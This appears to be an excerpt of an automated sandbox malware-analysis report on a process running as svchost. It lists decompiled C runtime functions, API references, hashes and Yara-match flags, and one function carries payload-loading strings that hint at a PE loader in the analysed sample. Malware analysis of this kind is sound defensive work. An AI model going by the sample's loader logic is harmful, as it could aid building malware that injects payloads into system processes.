                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6FD5D363(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6fd69b20) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6FD59FB4(_t46);
							E6FD5D6CD( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6FD59FB4(_t47);
							E6FD5D7CB( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6FD59FB4( *((intOrPtr*)(_t74 + 0x7c)));
						E6FD59FB4( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6FD59FB4( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6FD59FB4( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6FD59FB4( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6FD59FB4( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6FD5D4D6( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6fd695f0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6FD59FB4(_t31);
							E6FD59FB4( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6FD59FB4(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6FD59FB4(_t74);
			}















                                                0x6fd5d36b
                                                0x6fd5d36f
                                                0x6fd5d377
                                                0x6fd5d380
                                                0x6fd5d385
                                                0x6fd5d38c
                                                0x6fd5d394
                                                0x6fd5d39c
                                                0x6fd5d3a7
                                                0x6fd5d3ad
                                                0x6fd5d3ae
                                                0x6fd5d3b6
                                                0x6fd5d3be
                                                0x6fd5d3c9
                                                0x6fd5d3cf
                                                0x6fd5d3d3
                                                0x6fd5d3de
                                                0x6fd5d3e4
                                                0x6fd5d385
                                                0x6fd5d3e5
                                                0x6fd5d3ed
                                                0x6fd5d400
                                                0x6fd5d413
                                                0x6fd5d421
                                                0x6fd5d42c
                                                0x6fd5d431
                                                0x6fd5d43a
                                                0x6fd5d442
                                                0x6fd5d443
                                                0x6fd5d449
                                                0x6fd5d44c
                                                0x6fd5d44f
                                                0x6fd5d456
                                                0x6fd5d458
                                                0x6fd5d45c
                                                0x6fd5d464
                                                0x6fd5d46b
                                                0x6fd5d471
                                                0x6fd5d472
                                                0x6fd5d472
                                                0x6fd5d479
                                                0x6fd5d47b
                                                0x6fd5d480
                                                0x6fd5d488
                                                0x6fd5d48d
                                                0x6fd5d48e
                                                0x6fd5d48e
                                                0x6fd5d491
                                                0x6fd5d494
                                                0x6fd5d497
                                                0x6fd5d49a
                                                0x6fd5d49a
                                                0x6fd5d4ac

                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 6FD5D3A7
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D6EA
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D6FC
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D70E
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D720
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D732
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D744
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D756
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D768
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D77A
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D78C
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D79E
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D7B0
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D7C2
                                                • _free.LIBCMT ref: 6FD5D39C
                                                  • Part of subcall function 6FD59FB4: HeapFree.KERNEL32(00000000,00000000,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?), ref: 6FD59FCA
                                                  • Part of subcall function 6FD59FB4: GetLastError.KERNEL32(?,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?,?), ref: 6FD59FDC
                                                • _free.LIBCMT ref: 6FD5D3BE
                                                • _free.LIBCMT ref: 6FD5D3D3
                                                • _free.LIBCMT ref: 6FD5D3DE
                                                • _free.LIBCMT ref: 6FD5D400
                                                • _free.LIBCMT ref: 6FD5D413
                                                • _free.LIBCMT ref: 6FD5D421
                                                • _free.LIBCMT ref: 6FD5D42C
                                                • _free.LIBCMT ref: 6FD5D464
                                                • _free.LIBCMT ref: 6FD5D46B
                                                • _free.LIBCMT ref: 6FD5D488
                                                • _free.LIBCMT ref: 6FD5D4A0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 83744068f8a138381f16f599da2dc8001207209fee2ab8b09dcb3841ac0c09ea
                                                • Instruction ID: 9c35a145603be1280cfd382ef7240f5d8efc5190271600d4c5dfd16e8391a380
                                                • Opcode Fuzzy Hash: 83744068f8a138381f16f599da2dc8001207209fee2ab8b09dcb3841ac0c09ea
                                                • Instruction Fuzzy Hash: 2031F8B1608304DFEF91AF39D940B9AB3EAAF00354F10552AE559DA294DF71F8A0CB31
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AC243 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 039AC287
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADF7E
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADF90
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFA2
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFB4
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFC6
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFD8
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFEA
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFFC
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039AE00E
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039AE020
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039AE032
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039AE044
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039AE056
                                                • _free.LIBCMT ref: 039AC27C
                                                  • Part of subcall function 039A496C: HeapFree.KERNEL32(00000000,00000000,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?), ref: 039A4982
                                                  • Part of subcall function 039A496C: GetLastError.KERNEL32(?,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?,?), ref: 039A4994
                                                • _free.LIBCMT ref: 039AC29E
                                                • _free.LIBCMT ref: 039AC2B3
                                                • _free.LIBCMT ref: 039AC2BE
                                                • _free.LIBCMT ref: 039AC2E0
                                                • _free.LIBCMT ref: 039AC2F3
                                                • _free.LIBCMT ref: 039AC301
                                                • _free.LIBCMT ref: 039AC30C
                                                • _free.LIBCMT ref: 039AC344
                                                • _free.LIBCMT ref: 039AC34B
                                                • _free.LIBCMT ref: 039AC368
                                                • _free.LIBCMT ref: 039AC380
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 3d5a612719f40ca5a697d73fe7cd3b332a8458ffaeb5bac6b7136a863746cabb
                                                • Instruction ID: a3dacc413433c359ce158dc588719ba682992f37a7cb3cd9fd837761c7a4c9ec
                                                • Opcode Fuzzy Hash: 3d5a612719f40ca5a697d73fe7cd3b332a8458ffaeb5bac6b7136a863746cabb
                                                • Instruction Fuzzy Hash: 12316035608B04DFDB20EABDD844B5AB7ECAF80790F184669E459DF260DF71E850DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03995FD0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 136COMMON
                                                Download Yara Rule
                                                APIs
                                                • __Getcvt.LIBCPMT ref: 0399600E
                                                • __Getcvt.LIBCPMT ref: 03996046
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0399606E
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 039960AC
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 039960EC
                                                • numpunct.LIBCPMT ref: 039960F4
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 039960FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task$Getcvt$Exception@8Thrownumpunct
                                                • String ID: false$true
                                                • API String ID: 3191441162-2658103896
                                                • Opcode ID: d54be9c4f87c24154cb7062c2f82243672aed74ea7fce125a3eddb431de3ed7c
                                                • Instruction ID: e68272fbecc41226659334a26787134c2309ee9d3661ed27f6633d9e37ff0bc3
                                                • Opcode Fuzzy Hash: d54be9c4f87c24154cb7062c2f82243672aed74ea7fce125a3eddb431de3ed7c
                                                • Instruction Fuzzy Hash: F8412535A083418FEF14DF68C9407AABBB9EF85214F1981AFD8445F342DB769905CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5AFEA Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6FD5AFEA(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6fd61df0) {
					E6FD59FB4(_t52);
					_t26 = _a4;
				}
				E6FD59FB4( *((intOrPtr*)(_t26 + 0x3c)));
				E6FD59FB4( *((intOrPtr*)(_a4 + 0x30)));
				E6FD59FB4( *((intOrPtr*)(_a4 + 0x34)));
				E6FD59FB4( *((intOrPtr*)(_a4 + 0x38)));
				E6FD59FB4( *((intOrPtr*)(_a4 + 0x28)));
				E6FD59FB4( *((intOrPtr*)(_a4 + 0x2c)));
				E6FD59FB4( *((intOrPtr*)(_a4 + 0x40)));
				E6FD59FB4( *((intOrPtr*)(_a4 + 0x44)));
				E6FD59FB4( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6FD5AEB0(5,  &_v8);
				_v8 =  &_a4;
				return E6FD5AF00(4,  &_v8);
			}




                                                0x6fd5aff0
                                                0x6fd5aff3
                                                0x6fd5affb
                                                0x6fd5affe
                                                0x6fd5b003
                                                0x6fd5b006
                                                0x6fd5b00a
                                                0x6fd5b015
                                                0x6fd5b020
                                                0x6fd5b02b
                                                0x6fd5b036
                                                0x6fd5b041
                                                0x6fd5b04c
                                                0x6fd5b057
                                                0x6fd5b065
                                                0x6fd5b06d
                                                0x6fd5b076
                                                0x6fd5b07e
                                                0x6fd5b092

                                                APIs
                                                • _free.LIBCMT ref: 6FD5AFFE
                                                  • Part of subcall function 6FD59FB4: HeapFree.KERNEL32(00000000,00000000,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?), ref: 6FD59FCA
                                                  • Part of subcall function 6FD59FB4: GetLastError.KERNEL32(?,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?,?), ref: 6FD59FDC
                                                • _free.LIBCMT ref: 6FD5B00A
                                                • _free.LIBCMT ref: 6FD5B015
                                                • _free.LIBCMT ref: 6FD5B020
                                                • _free.LIBCMT ref: 6FD5B02B
                                                • _free.LIBCMT ref: 6FD5B036
                                                • _free.LIBCMT ref: 6FD5B041
                                                • _free.LIBCMT ref: 6FD5B04C
                                                • _free.LIBCMT ref: 6FD5B057
                                                • _free.LIBCMT ref: 6FD5B065
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 2f315500217ec595588157691310045d98d58bf20d4f318b95f2ab26f63bbc49
                                                • Instruction ID: 5304281465e57801efa31ad042b6e0591807b6cb3f565a8a3a52a64e1d62d22b
                                                • Opcode Fuzzy Hash: 2f315500217ec595588157691310045d98d58bf20d4f318b95f2ab26f63bbc49
                                                • Instruction Fuzzy Hash: 1A11B6B6100248BFCF81DF94C940CD97BBAEF14254B4152A1FA088F2A5DB31FA60DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A5DC2 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 039A5DD6
                                                  • Part of subcall function 039A496C: HeapFree.KERNEL32(00000000,00000000,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?), ref: 039A4982
                                                  • Part of subcall function 039A496C: GetLastError.KERNEL32(?,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?,?), ref: 039A4994
                                                • _free.LIBCMT ref: 039A5DE2
                                                • _free.LIBCMT ref: 039A5DED
                                                • _free.LIBCMT ref: 039A5DF8
                                                • _free.LIBCMT ref: 039A5E03
                                                • _free.LIBCMT ref: 039A5E0E
                                                • _free.LIBCMT ref: 039A5E19
                                                • _free.LIBCMT ref: 039A5E24
                                                • _free.LIBCMT ref: 039A5E2F
                                                • _free.LIBCMT ref: 039A5E3D
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: ffd8e02bae27000d9d191fc33cfe40a23da899faf84b08954f4d01e3a173baea
                                                • Instruction ID: 007784e593a31d2fd559e37eb7bd39a9fd7c3fd1c3e6500bf4710378498083dc
                                                • Opcode Fuzzy Hash: ffd8e02bae27000d9d191fc33cfe40a23da899faf84b08954f4d01e3a173baea
                                                • Instruction Fuzzy Hash: D511B97A108608FFCB01EF99C840DED7BB9EFC4A90F114291F9489F221D671DE609B84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039B0653 Relevance: 13.8, APIs: 9, Instructions: 300COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0aa5c53377d6a1c3e6b6ffca0d6281793f1c8ae0abcf291923756ebd064b890
                                                • Instruction ID: b65ab77c75bdb626fed1e9ad0b01d82756bad806b2e3aa315022d4b34be7c29c
                                                • Opcode Fuzzy Hash: e0aa5c53377d6a1c3e6b6ffca0d6281793f1c8ae0abcf291923756ebd064b890
                                                • Instruction Fuzzy Hash: 52C1A275A08349AFEF11DFACC990BEEBBB8BF49350F184184D445AB392C7719941CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0399A5FE Relevance: 13.7, APIs: 9, Instructions: 200COMMON
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 0399A647
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?), ref: 0399A6DB
                                                • ___crtCompareStringEx.LIBCPMT ref: 0399A6F5
                                                • ___crtCompareStringEx.LIBCPMT ref: 0399A731
                                                • ___crtCompareStringEx.LIBCPMT ref: 0399A7AA
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0399A7C5
                                                • __freea.LIBCMT ref: 0399A7D2
                                                  • Part of subcall function 039A4899: RtlAllocateHeap.NTDLL(00000000,039920FE,73B76490), ref: 039A48CB
                                                • __freea.LIBCMT ref: 0399A7E5
                                                • __freea.LIBCMT ref: 0399A7F0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharCompareMultiStringWide___crt__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 621115845-0
                                                • Opcode ID: 782ba2a982e839d140e5f769c3f8fb554469a017da29e9e6774eb4b2111c5518
                                                • Instruction ID: 2b92c04006d1ea80f5dfbc8a1f2b1296764ecf2060f6945ac7e5914dc2b5159a
                                                • Opcode Fuzzy Hash: 782ba2a982e839d140e5f769c3f8fb554469a017da29e9e6774eb4b2111c5518
                                                • Instruction Fuzzy Hash: AC51EB72E00216ABEF25DFADCC81DAFBBB9EF90750B18856AE904DA150DB35C950C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03996830 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 258COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996542
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996564
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996578
                                                • IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996856
                                                • IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 0399688C
                                                Strings
                                                • Invalid payload: , xrefs: 03996ACE
                                                • [-] VirtualAddress of section is out ouf bounds: , xrefs: 03996A39
                                                • [!] Truncated to maximal size: , xrefs: 039969BE
                                                • [!] Virtual section size is out ouf bounds: , xrefs: 0399697C
                                                • [-] Raw section size is out ouf bounds: , xrefs: 03996A80
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead
                                                • String ID: Invalid payload: $[!] Truncated to maximal size: $[!] Virtual section size is out ouf bounds: $[-] Raw section size is out ouf bounds: $[-] VirtualAddress of section is out ouf bounds:
                                                • API String ID: 2080902951-4122123222
                                                • Opcode ID: f9b0182408fa1b1dc5b80e4ff22b49505a96088b75084aabc6bc69c1ba63d899
                                                • Instruction ID: 9bd47daefe41fc656c6b324722d590c226c6eaaa726e26004d4b52047b09dc05
                                                • Opcode Fuzzy Hash: f9b0182408fa1b1dc5b80e4ff22b49505a96088b75084aabc6bc69c1ba63d899
                                                • Instruction Fuzzy Hash: 0B81D275F012069BEF18DF6DD880A7FB7B9EF84324B18846ED406DB345EA34E8158B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03995BC0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03995BED
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03995C10
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03995C30
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03995CA9
                                                • std::_Facet_Register.LIBCPMT ref: 03995CBF
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03995CCA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: bad cast
                                                • API String ID: 2536120697-3145022300
                                                • Opcode ID: 545ca290a014f3a6b91492b482682a493a629f09c69b0e7c3e35217af7afbfbf
                                                • Instruction ID: 972f792f7994d836ad3648d7171378901e225d2e8fa218b86f461ffa2e119385
                                                • Opcode Fuzzy Hash: 545ca290a014f3a6b91492b482682a493a629f09c69b0e7c3e35217af7afbfbf
                                                • Instruction Fuzzy Hash: 4731EF76904215DBDF12EF9CD880AAEB7BCFB45724F16466AD811AB380E731A904CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03995740 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0399576D
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03995790
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 039957B0
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03995829
                                                • std::_Facet_Register.LIBCPMT ref: 0399583F
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0399584A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: bad cast
                                                • API String ID: 2536120697-3145022300
                                                • Opcode ID: 132bae5e73f73d9155a15ff8dcc2b813172b965b5cf739f8e222646f4c42bd45
                                                • Instruction ID: 55c93d385197df1322aeb1a6ebb6d2f0e3d3f4958fa450319c1b71f410814df3
                                                • Opcode Fuzzy Hash: 132bae5e73f73d9155a15ff8dcc2b813172b965b5cf739f8e222646f4c42bd45
                                                • Instruction Fuzzy Hash: 1831E375914305DBDF11EF5CD880AAEB7B8FF49310F26469AD811AB280DB31A905CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03995CF0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03995D1D
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03995D40
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03995D60
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03995DD9
                                                • std::_Facet_Register.LIBCPMT ref: 03995DEF
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03995DFA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: bad cast
                                                • API String ID: 2536120697-3145022300
                                                • Opcode ID: 3ef06d20bcd98505060650ebbb536e1e05dcdee645e0c30e5f4a6428245fc390
                                                • Instruction ID: e406815436b25a4a7704bc07b24d1567080036b6a4b458329d0ff7f923059b05
                                                • Opcode Fuzzy Hash: 3ef06d20bcd98505060650ebbb536e1e05dcdee645e0c30e5f4a6428245fc390
                                                • Instruction Fuzzy Hash: 1431F07A910214DFEF12EF5CD880AAEB7B8FF45714F16429AD811AB380D731A901CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03992F30 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 71COMMON
                                                Download Yara Rule
                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03992F65
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03992F92
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03992FBF
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03992FEC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception@8Throw
                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                • API String ID: 2005118841-1866435925
                                                • Opcode ID: 69a9f3c97a77e35e8eeb15782f2a3d19689c4511cf71f4bcb449c646dab75b23
                                                • Instruction ID: b647fc6111be47cc99b03cb74c4d24cce68cfc1307f9f58949c5925c227d01c7
                                                • Opcode Fuzzy Hash: 69a9f3c97a77e35e8eeb15782f2a3d19689c4511cf71f4bcb449c646dab75b23
                                                • Instruction Fuzzy Hash: C611CA745443087EFE00EB29CD12FAE77AC9BC0744F404C5EB9D4AA1D2D67090848B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A7910 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • _free.LIBCMT ref: 039A7C2B
                                                • _free.LIBCMT ref: 039A7C44
                                                • _free.LIBCMT ref: 039A7C76
                                                • _free.LIBCMT ref: 039A7C7F
                                                • _free.LIBCMT ref: 039A7C8B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorLast$_abort
                                                • String ID: C
                                                • API String ID: 1702784200-1037565863
                                                • Opcode ID: 9a532973fa5698834d3ca7e6d144c450cae51f17c42fd2a73e96782de38ef112
